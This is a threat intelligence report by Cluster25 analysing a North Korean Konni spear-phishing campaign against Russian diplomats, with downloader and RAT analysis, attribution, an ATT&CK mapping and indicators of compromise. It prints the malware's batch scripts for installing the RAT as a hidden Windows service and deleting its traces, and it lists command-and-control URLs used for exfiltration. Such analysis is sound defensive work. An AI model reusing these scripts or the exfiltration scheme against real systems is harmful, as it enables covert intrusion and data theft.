01 // 03 // 2022 **TLP:WHITE** ### NORTH KOREAN GROUP “KONNI” TARGETS THE RUSSIAN DIPLOMATIC SECTOR WITH NEW VERSIONS OF MALWARE IMPLANTS ### THE RUSSIAN DIPLOMATIC SECTOR WITH NEW VERSIONS OF MALWARE IMPLANTS www.cluster25.io @cluster25_io ----- # TABLE OF CONTENTS ###### KILLCHAIN OVERVIEW 4 INITIAL ACCESS 4 DOWNLOADER ANALYSIS 5 KONNI RAT ANALYSIS 10 ATTRIBUTION 13 ATT&CK MATRIX 14 INDICATORS OF COMPROMISE 16 ABOUT CLUSTER25 19 2022 // © Cluster25 ----- ## EXECUTIVE SUMMARY ##### Cluster25 analyzed a recent attack linked to the ##### Cluster25 analyzed a recent attack linked to the North Korean APT group “Konni” targeting Russian diplomatic sector using a spear phishing theme for New Year's Eve festivities as lure. Once the malicious email attachment is opened and executed, a chain composed by multiple stages is ----- Unrestricted // freely shareable content #### 01 KILLCHAIN OVERVIEW The following diagram shows the overall phases used by the actor to infect the target. The malicious activity starts from an email containing a malicious zip file, which once decompressed drops a malicious downloader able to activate a complex chain of actions finalized to deploy Konni RAT malware, named scrnsvc.dll, as Windows service. #### 02 INITIAL ACCESS C25 has traced an activity that started at least from August 2021 aimed at Russian targets operating in the diplomatic sector. ----- Unrestricted // freely shareable content On December 20th emails crafted to infect the Russian embassy located in Indonesia have been detected; these emails used the New Year Eve 2022 festivity as decoy theme. Contrary to its past actions, the North Korean APT group this time did not use malicious documents as attachments; instead, they attached a .zip file type named “поздравление.zip”, which means “congratulation” in Russian, containing an embedded executable representing the first stage of the infection. The emails were spoofed using a *@mid.ru account as a sender to pretend that it was sent from the Russian Embassy in Serbia. #### 03 DOWNLOADER ANALYSIS The artifact found and extracted from the zip is a Windows x32 executable, named “поздравление.scr” and compiled in date Mon Dec 20 09:16:02 2021. From the recent compilation date, it seems to have been developed specifically for the attack under analysis, and it can be identified by the following hash: SHA256 cdfc101b18b9b3f9e418fbb9a6b7d2750d5918c61ed3899ca4ecd7ede5022ac5 ----- Unrestricted // freely shareable content The sample has the behavior of a trojan malware, and it is intended to resemble the legitimate scrnsave.scr Windows application. When executed, it drops under the %TEMP% directory an image named Happy.jpg (which is embedded in the resource section) and opens it as a foreground window to trick the victim into believing that it is a legitimate Russian themed happy holidays screensaver. Subsequently, in the background, the malware starts its malicious activities by downloading the next stage payload from an HTTP GET request to the Command-and-Control domain i758769.atwebpages.com, passing as parameters the hardcoded user id numbered as 18756 and a type used as a flag to specify if the infected machine was 32 or 64 bit. The Command-and Control Apache webserver response was configured to respond with HTTP status code 401, having the attacker set a fake .htaccess (likely to ensure it went unnoticed at security checks), returning as a response, in any case, a compressed CAB file encoded in base64 visible in the evidence below. ----- Unrestricted // freely shareable content After the CAB downloading, the malware starts the file decompression using expand.exe process logging a file named - a.log - when the decompression is finished. The following image illustrates the snipped of code described. ----- Unrestricted // freely shareable content To optimize the time wasted during CAB decompression, the malware writes and executes the following BAT file into the %TEMP% directory, which was contained in the data section encoded in base64: CODE @ECHO OFF CD /D %TEMP% : WAITING TIMEOUT /T 1 IF NOT EXIST "A.LOG" (GOTO WAITING) DEL /F /Q "A.LOG" INSTALL.BAT DEL /F /Q "%~DPNX0” The script’s scope is to wait for the decompression to finish by using the creation of a.log file as flag and automatically execute the content of the CAB extraction, which is the install.bat file (one of the files contained into the CAB), and finally delete itself using "%~DPNX0”, a bat script convention used to specify the BAT file itself. As previously described the CAB file’s decompressed content contains the following files: - Install.bat - scrnsvc.ini - scrnsvc.dll Install.bat file is the launcher of the next stage infection, which hides the tracks of the previous activities by moving all the files into the System32 directory and installing and starting the final ----- Unrestricted // freely shareable content implant scrnsvc.dll as a Windows service named ScreenSaver Management Service, which, when registered, loads the configuration file scrnvsvc.ini. The Windows service is installed by configuring svchost.exe as a process container of the DLL executable representing Konni RAT malware. Install.bat has already been seen among the TTPs belonging to this threat actor, which content is visible below, where, in this case, it appears to have been slightly modified, and therefore more likely to deceive detection signatures referring to files used in previous intrusions. CODE @echo off set DSP_NAME="ScreenSaver Management Service" sc stop scrnsvc > nul echo %~dp0 | findstr /i "system32" > nul if %ERRORLEVEL% equ 0 (goto INSTALL) else (goto COPYFILE) : COPYFILE copy /y "%~dp0\scrnsvc.dll" "%windir%\System32" > nul del /f /q "%~dp0\scrnsvc.dll" > nul copy /y "%~dp0\scrnsvc.ini" "%windir%\System32" > nul del /f /q "%~dp0\scrnsvc.ini" > nul del /f /q "%windir%\System32\scrnsvc.dat" > nul : INSTALL sc create scrnsvc binpath= "%windir%\System32\svchost.exe -k scrnsvc" DisplayName= %DSP_NAME% > nul sc description scrnsvc %DSP_NAME% > nul sc config scrnsvc type= interact type= own start= auto error= normal binpath= "%windir%\System32\svchost.exe -k scrnsvc" - nul reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost" /v scrnsvc /t REG_MULTI_SZ /d "scrnsvc" /f > nul ----- Unrestricted // freely shareable content CODE reg add "HKLM\SYSTEM\CurrentControlSet\Services\scrnsvc\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "%windir%\System32\scrnsvc.dll" /f > nul sc start scrnsvc > nul del /f /q "%~dp0\wpnprv.dll" > nul del /f /q "%~dp0\*.bat" > nul del /f /q "%~dpnx0" > nul #### 04 KONNI RAT ANALYSIS The following Konni Rat version is a x64 DLL executable, which has as compile timestamp Mon Dec 20 09:02:38 2021 - UTC, same date of the downloader, and where the payload is contained in its export function ServiceMain and is directly invoked when registered as Windows service. Cluster25 retrieved two different samples of the same Konni version identified by the following hashes: SHA256 cdfc101b18b9b3f9e418fbb9a6b7d2750d5918c61ed3899ca4ecd7ede5022ac5 8f7037aaf27bb58a15f946bd3a30cb468078a7ee9addcc4ba89440b2114e4c83 Once registered as a service, the malware starts solving in runtime all the WinAPIs needed to interface with the infected operating system's file system and to communicate with the control and monitoring server. The exported functions loaded belong to the following libraries: - kernel32.dll - advapi23.dll - urlmon.dll ----- Unrestricted // freely shareable content - wininet.dll - shell32.dll It then creates a pointer memory structure used to store the configuration used by the malware during execution, which contains information such as the name of the computer, the time of seconds to remain asleep, the domain used to communicate with the adversary command and control, and all the information collected during the future enumeration. The configuration structure is then passed as argument at a new thread created which is used as main routine by the malware to perform the network communications and exfiltration, as visible in the following code snippet. The thread starts verifying if there is Internet connection available, remaining in sleep if not, then adds the value 65001 into the Registry key in Console Codepage, to make Unicode character set in cmd.exe by default, and collects data: - Enumerated cached website via FindFirstUrlCacheEntryW and FindNextUrlCacheEntryW - Enumerated operating system information using cmd /c systeminfo - Enumerated processes using cmd /c tasklist.exe ----- Unrestricted // freely shareable content Once the enumeration has been completed, it stores all the info into temporary files which will then be converted into a CAB file using cmd /c makecab and furtherly encrypted and sent to the attacker server via HTTP POST request body to hxxp://455686[.]c1[.]biz/up[.]php?name=%COMPUTER-NAME%, passing the operating system computer name as parameter as evidences in the network dump reported following: If the server response does not contain the string “success!” the malware tries to resend the request, or it starts to send HTTP GET loop requests to receive commands from the server located at hxxp://455686[.]c1[.]biz /dn.php?name=%COMPUTERNAME%&prefix=tt. The commands received are parsed from the response and, if containing the character ”>” are executed via CreateProcessAsUserW obtaining the Token belonging to svchost.exe process (likely to avoid exceptions during output redirection of the file writing, being the sample located in System32 folder), otherwise using the CreateProcessW function. ----- Unrestricted // freely shareable content At the time of the analysis the server was up but it did not provide the commands to be executed, probably because the actor set up the Command and Control backend with some form of geofencing validation. #### 05 ATTRIBUTION Cluster25 attributes these intrusion attempts with high degree of confidence to the North Korean group known as Konni. Konni is also the name of their custom RAT which presents intelligence gathering features. In this case the final implant is a new version of Konni RAT having code and behavioral similarities with its previous versions. The reported kill-chain shows overlaps with the TTPs already linked to this group as the use of CAB files as infection stage and the use of bat file to automatically install Konni RAT as a service. Identifiable modifications are evident in the pattern used for the initial access phase, most likely put in place to exploit the holiday time of year as bait. ----- Unrestricted // freely shareable content Finally, it is possible to notice the use of "ZETTA HOSTING SOLUTIONS LLC" (AS44476) as hosting provider and the use of free hosting sites like c1 dot biz and atwebpages dot com for the Command and Controls hostnames. Specifically, atwebpages dot com appears to be commonly observable in intrusions relating to threat actors belonging to the Kimsuki umbrella. #### 06 ATT&CK MATRIX |TACTIC|TECHNIQUE NAME|Col3| |---|---|---| |Initial Access T1566 Phishing||| |T1059 Command and Scripting Interpreter Execution T1204 User Execution T1569 System Services||| |Persistence T1543 Create or Modify System Process||| |T1543 Create or Modify System Process Privilege Escalation T1134 Access Token Manipulation||| |||Access Token Manipulation| ----- Unrestricted // freely shareable content |TACTIC|TECHNIQUE NAME|Col3| |---|---|---| |T1134 Access Token Manipulation Defense Evasion T1140 Deobfuscate/Decode Files or Information||| |T1082 System Information Discovery Discovery T1057 Process discovery T1033 System Owner/User Discovery||| |T1560 Archive Collected Data T1113 Screen Capture Collection T1119 Automated Collection||| |T1071 Application Layer Protocol Command and Control Data encoding||| |||Data encoding| ----- Unrestricted // freely shareable content TACTIC TECHNIQUE T1132 T1020 Exfiltration 1041 #### 07 INDICATORS OF COMPROMISE |TACTIC|TECHNIQUE NAME|Col3| |---|---|---| |T1132||| |T1020 Automated Exfiltrated Exfiltration 1041 Exfiltration Over C2 Channel||| |||Exfiltration Over C2 Channel| |CATEGORY|TYPE|VALUE| |---|---|---| |||| PAYLOAD-DELIVERY SHA256 53b687202e69dd8d5e2e841036c96a12b93971c9ff99ca54c109c491e7ad8eba |PAYLOAD-DELIVERY SHA1 189fdac8fd88d61ba9cbd4f7d27561a6f60a9666|Col2|Col3| |---|---|---| |PAYLOAD-DELIVERY MD5 ad152ab451527cf2baa96304c6ecd383||| |PAYLOAD-DELIVERY SHA256 72185f9dbf66d0e5dc0e1873934c183bc120708085c0de8a0e2a748f10f77de8||| |PAYLOAD-DELIVERY SHA1 b433cc324a785e1d0291c961e2816e91a9549057||| |PAYLOAD-DELIVERY MD5 3462e40caeec0fa52bd3c04ad8cbc9d3||| |PAYLOAD-DELIVERY|SHA256|451b9d4144555fcc791231db73ef3bfdb6ffddeb655e07a457108766f0e6ad39| ----- Unrestricted // freely shareable content PAYLOAD-DELIVERY SHA1 fb7d9bc8309f589e39e091ef5a7b08260596ffcd |PAYLOAD-DELIVERY MD5 8ec9a6ff22c497375b53344cafeb2292|Col2|Col3| |---|---|---| |PAYLOAD-DELIVERY SHA256 4ca8ac99b2416d8fae67a8b18a58c8d267b7e2b72af1ee0369f2470a030af8c7||| |PAYLOAD-DELIVERY SHA1 6883e1c2c1f3656cb756264fde77f88ebcde541c||| |PAYLOAD-DELIVERY MD5 446ea8033ae343971312745c79fced2e||| |PAYLOAD-DELIVERY SHA256 b6845a436df2b3a79dd1b0e4a57a06c60f718eee0272a3eb81183ee4750037b9||| |PAYLOAD-DELIVERY SHA1 191604259def68250272919214aea109503200fe||| |PAYLOAD-DELIVERY MD5 8269e1b2afaa832e7900640ebfe44bb4||| |PAYLOAD-DELIVERY SHA256 24f5fb91ca41e4a191a44629f064fa14c4063b7cda68ebc2b7afb7e68a9d3cdd||| |PAYLOAD-DELIVERY SHA1 f08c033d1a9f2f75a17cbcb71e3041263d2d3e61||| |PAYLOAD-DELIVERY MD5 58560f053a099104b0f8ac1c9fed2903||| |PAYLOAD-DELIVERY SHA256 a3cd08afd7317d1619fba83c109f268b4b60429b4eb7c97fc274f92ff4fe17a2||| |PAYLOAD-DELIVERY SHA1 c1d312762d598831d431b08e47075047582856aa||| |PAYLOAD-DELIVERY|MD5|57a22e74ba27b034613b0c6ac54a10d5| ----- Unrestricted // freely shareable content PAYLOAD-DELIVERY SHA256 8f7037aaf27bb58a15f946bd3a30cb468078a7ee9addcc4ba89440b2114e4c83 |PAYLOAD-DELIVERY SHA1 fc54cefe956ed5360418c0165cf2a687bbeb62fc|Col2|Col3| |---|---|---| |PAYLOAD-DELIVERY MD5 954fe31816f2f7f095244573de8f9086||| |CNC HOSTNAME i758769.atwebpages.com||| |CNC HOSTNAME 455686.c1.biz||| |CNC HOSTNAME h378576.atwebpages.com||| |DROP-POINT URL http://i758769.atwebpages.com/index.php?user_id=18756&type=1||| |CNC URL http://455686.c1.biz/dn.php?name=HOME-DESK&prefix=tt||| |CNC|URL|http://h378576.atwebpages.com /dn.php?name=HOME-DESK&prefix=tt| ----- ###### ABOUT CLUSTER25 Cluster25 is the internal Cyber Intelligence Research and Adversary Hunting Unit at DuskRise Inc. Cluster25 experts are specialized in hunting and collecting cyber threats, analysis, reverse-engineering and adversary hunting practices. Cluster25 independently designs and develops technologies aimed at the classification and categorization of malicious artifacts as well as for their correlation with known threat groups. Relying on extensive visibility into the digital threat landscape, it overcomes the usual limitations of services based on _ex-post threat observation by providing real predictive_ and proactive intelligence services. Visit us at cluster25.io IMPORTANT NOTICE: ©2021 Cluster25. All rights reserved. The reproduction and distribution of this material is prohibited without express written permission from Cluster25. Traffic Light Protocol (TLP) violation could lead to the immediate cancellation of existing services as well as the initiation of legal actions aimed at protecting the intellectual property and competitive advantage of DuskRise Inc. Given the inherent nature of threat intelligence, the content contained in this report is based on information gathered and understood at the time of its creation. The information in this report is general in nature and does not take into account the specific needs of your IT ecosystem and network, which may vary and require unique action. As such, Cluster25 provides the information and content on an “as-is” basis without representation or warranty and accepts no liability for any action or failure to act taken in response to the information contained or referenced in this report. The reader is responsible for determining whether or not to follow any of the suggestions, recommendations or potential mitigations set out in this report, entirely at their own discretion. -----